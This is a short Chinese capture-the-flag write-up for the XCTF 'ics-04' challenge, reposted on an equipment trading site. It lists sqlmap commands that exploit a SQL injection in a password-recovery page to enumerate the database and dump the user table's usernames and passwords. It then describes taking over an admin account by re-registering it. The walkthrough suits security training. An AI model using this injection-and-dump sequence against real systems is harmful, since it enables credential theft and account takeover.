傲云油气装备网

让卖家找上门

发布询价单>>

微信扫一扫

傲云油气装备网二维码

热门分类
首页 > 资讯中心 > 物联网 > 物联网技术文章

[wp] 攻防世界 ics-04

   日期:2020-05-01     浏览:208    评论:0    
核心提示:尝试注册登陆账号扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入sql网络

尝试注册登陆账号

扫了下目录没发现什么,用sqlmap把每个页面跑过去,发现在找回密码页面有注入

sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1"
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" --dbs
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 --tables
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user --columns
sqlmap.py -u "http://111.198.29.45:46827/findpwd.php" --data="username=1" -D cetc004 -T user -C username&password --dump


被hash加密了,发现注册页面可以再次注册c3tlwDmIn23这个账号,成功重置密码,登入得到flag

 
标签: 文章标签: sqlmap
打赏
 本文转载自:网络 
所有权利归属于原作者,如文章来源标示错误或侵犯了您的权利请联系微信13520258486
更多>最近资讯中心
• centos6.10安装 docker 实操记录 20190924 • Nginx缓存
• 面向对象 • 回答这份秒杀攻略,99.9%的面试官会给你比大拇
• 5G 专网部署方案 • 少吃了一餐饭,省下的钱买了份资料,我把它分享
• Esp8266天猫精灵_RGB灯_非点灯平台 • STM32F103 串口1和串口3对发数据 配合蓝牙模块
• TMS570学习【1】了解什么是TMS570 • 新闻稿 | Qt公司收购froglogic公司以巩固市场领
• [Java]SpringBoot2整合mqtt服务器EMQ实现消息订 • 苹果群控投屏同步操作原理及运用的平台APP分享
更多>最新资讯中心
• Esp8266天猫精灵_RGB灯_非点灯平台 • STM32F103 串口1和串口3对发数据 配合蓝牙模块
• TMS570学习【1】了解什么是TMS570 • 新闻稿 | Qt公司收购froglogic公司以巩固市场领
• [Java]SpringBoot2整合mqtt服务器EMQ实现消息订 • 苹果群控投屏同步操作原理及运用的平台APP分享
• STM32查询式按键输入[直接用寄存器] • Ubuntu系统 USB设备端口绑定
• 2021-04-14 第四次 按键输入实验 • Flutter扫码功能完美实现
更多>相关资讯中心
• 谈谈Spring中的对象跟Bean,你知道Spring怎么创 • 面试|有关字符串中字符出现重复字符的面试问题
• 老王的JAVA基础课:第4课 以hello world学习基 • 配置SpringBoot项目热部署
• 我的Java学习之路(九)-- 模拟斗地主扑克牌发 • 深入浅出的Java面向对象编程,助你深入探索开发
• 关于blob与流互转的问题 • 在Java中MD5、SHA、SHA256、SHA512加密的实现[
• Java设计模式---原型模式 • spring boot整合mybatis+druid和多数据源外加dr
0相关评论

推荐图文
推荐资讯中心
点击排行
最新信息
新手指南
采购商服务
供应商服务
交易安全
关注我们
手机网站:
新浪微博:
微信关注:

13520258486

周一至周五 9:00-18:00
(其他时间联系在线客服)

24小时在线客服